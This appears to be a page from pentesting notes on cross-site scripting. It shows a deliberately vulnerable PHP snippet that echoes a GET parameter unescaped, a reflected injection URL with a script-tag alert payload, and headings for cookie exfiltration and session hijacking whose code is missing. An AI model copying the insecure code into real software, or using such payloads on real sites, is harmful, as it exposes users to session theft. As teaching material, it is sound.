search

XSS

Cross-Site Scripting (XSS)

hashtag
Reflected

hashtag
Vulnerable code

<?php
        echo '<div><p>Searched string: ' . $_GET['search'] . '</p></div>';
?>

hashtag
The injection

http(s)://HOST/file.php?search=1

hashtag
Response

<div><p>Searched string: 1</p></div>

http(s)://HOST/file.php?search=</p><script>alert()</script><p>

hashtag
Response

<div><p>Searched string: </p><script>alert()</script><p></p></div>

As you can see, the injected code gets inserted into the HTML response of the website.

</p> -> Closing current tag. <script> -> Opening javascript tag. alert() -> Function to pop an alert box. </script> -> Closing javascript tag. <p> -> Reopening p tag for the response not to mess up.

hashtag
Stored

In this injection, the code gets stored into a database (e.g. as a comment, name, description, etc) and then gets reflected when it is displayed.

hashtag
Data exfiltration

To exfiltrate data, a receiving server would be needed, like a HTPP server.

NGROK's substitute for tunXs and python's SimpleHTTPSever/http.server

hashtag
Exfiltrating basic data

hashtag
Exfiltrating other endpoint's data

hashtag
Session Hijaking

In a nuthshell, stealing the (administrator|authenticated user) sesion cookie's value and using it.

hashtag
Exfiltrating the cookie

hashtag
Using the cookie

hashtag
Filter Bypass

https://owasp.org/www-community/xss-filter-evasion-cheatsheetowasp.orgchevron-right
https://itasahobby.gitlab.io/posts/trustedclient/itasahobby.gitlab.iochevron-right
PreviousResourcesNextXXE

Last updated